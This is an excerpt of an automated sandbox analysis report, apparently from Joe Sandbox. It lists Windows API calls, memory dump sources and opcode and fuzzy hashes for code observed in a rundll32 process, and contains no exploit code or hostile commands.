                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0463CBC9
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0463CC27
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0463CC84
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0463CCB7
                                                                                • Part of subcall function 0463CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0463CC35), ref: 0463CB8B
                                                                                • Part of subcall function 0463CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0463CC35), ref: 0463CBA8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                              • String ID:
                                                                              • API String ID: 2255706666-0
                                                                              • Opcode ID: 5f8b28d9da5074ba87ff7083ab1fc04d8a6221fed732b2aaeddd93a1ea9b850c
                                                                              • Instruction ID: edcdb0acf4b6f6a0d27b70c4003944c8dad82b6ad774628c9cd53e75051c4b2d
                                                                              • Opcode Fuzzy Hash: 5f8b28d9da5074ba87ff7083ab1fc04d8a6221fed732b2aaeddd93a1ea9b850c
                                                                              • Instruction Fuzzy Hash: 22315071E0025EABDF10DFE8C884AAEB7B4FF15706F004569E951F7290EB75AA04CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,048671C0,0481813C), ref: 048174C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID:
                                                                              • API String ID: 2558294473-0
                                                                              • Opcode ID: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction ID: 31629f1292054e6a431d8f63508c641feb76db58ad29e96e1af4df33919fbb62
                                                                              • Opcode Fuzzy Hash: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction Fuzzy Hash: 3031B4707002805BEB55FE6CC8C4BDA379A5F44308F444ABAAD06DF2AADA74FC84C765
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindow.USER32(?,00000004), ref: 0481685A
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 04816877
                                                                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 04816883
                                                                              • IsWindowVisible.USER32(?), ref: 048168DD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Process$CurrentThreadVisible
                                                                              • String ID:
                                                                              • API String ID: 3926708836-0
                                                                              • Opcode ID: bd925d038154b3e6289e25fe58b5d93fda2f063e85b695ef3b1e864040738814
                                                                              • Instruction ID: 7620c319b1ff23b5e6def2fd1e83749e9bf98a839955040d94036731eb5d9dcf
                                                                              • Opcode Fuzzy Hash: bd925d038154b3e6289e25fe58b5d93fda2f063e85b695ef3b1e864040738814
                                                                              • Instruction Fuzzy Hash: 54314D75A10205DBEB50DFA9D8C4BAA73A8FB44314F044A7AE944E7351EB39FD008BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(04816534), ref: 04816625
                                                                              • GetWindow.USER32(00000003,00000003), ref: 0481663D
                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0481664A
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 04816689
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID:
                                                                              • API String ID: 4191631535-0
                                                                              • Opcode ID: b2b8659282ac86e44a25ec99f90b7c65b8437ce3fd897b989bfa4498a09fe261
                                                                              • Instruction ID: e444005880bd4c26db36986452134a0f9e4c0ef10f1bcee2cceeeec51dcd0700
                                                                              • Opcode Fuzzy Hash: b2b8659282ac86e44a25ec99f90b7c65b8437ce3fd897b989bfa4498a09fe261
                                                                              • Instruction Fuzzy Hash: 64117070705710AFEB50AB188884F9973D89B46728F144669FDD8EF2E1E774A840C766
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04761D11
                                                                              • GetCurrentProcessId.KERNEL32(?,?,00000000,04819BD1,?,?,?,00000001,04817DAB), ref: 04761D1A
                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04761D2F
                                                                              • GetPropW.USER32(00000000,00000000), ref: 04761D46
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 2582817389-0
                                                                              • Opcode ID: 209ccea09c22b164dff2d219e048f77f07c571c7c7b8796f702dee75f521888a
                                                                              • Instruction ID: f67bb6fd617d820163a1fffdae30a4568da050048b467aea3bc486828de08994
                                                                              • Opcode Fuzzy Hash: 209ccea09c22b164dff2d219e048f77f07c571c7c7b8796f702dee75f521888a
                                                                              • Instruction Fuzzy Hash: 95F03052310261ABAF20B6FA5C8882B328ECE442A93811935FD06D6214EA28AC4593F6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(NTDLL.DLL,NtQueryObject,?,00000000), ref: 04652E7E
                                                                                • Part of subcall function 04644E00: GetProcAddress.KERNEL32(?,?), ref: 04644E2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: NTDLL.DLL$NtQueryObject
                                                                              • API String ID: 1646373207-3865875859
                                                                              • Opcode ID: 32e55d343e7dbb73099c0b3f4e52aa38c1274935167546b0f482ce3ad4f1dfec
                                                                              • Instruction ID: 1df1ed02c02e72e7f1aae1025bb60b8b7c95b6e46d9bd6bec6acd7346959d8a7
                                                                              • Opcode Fuzzy Hash: 32e55d343e7dbb73099c0b3f4e52aa38c1274935167546b0f482ce3ad4f1dfec
                                                                              • Instruction Fuzzy Hash: 64110471644204BFEB10EB94FC56B5EB3EDE749B16F1004A5F504E3290E775BD408E98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%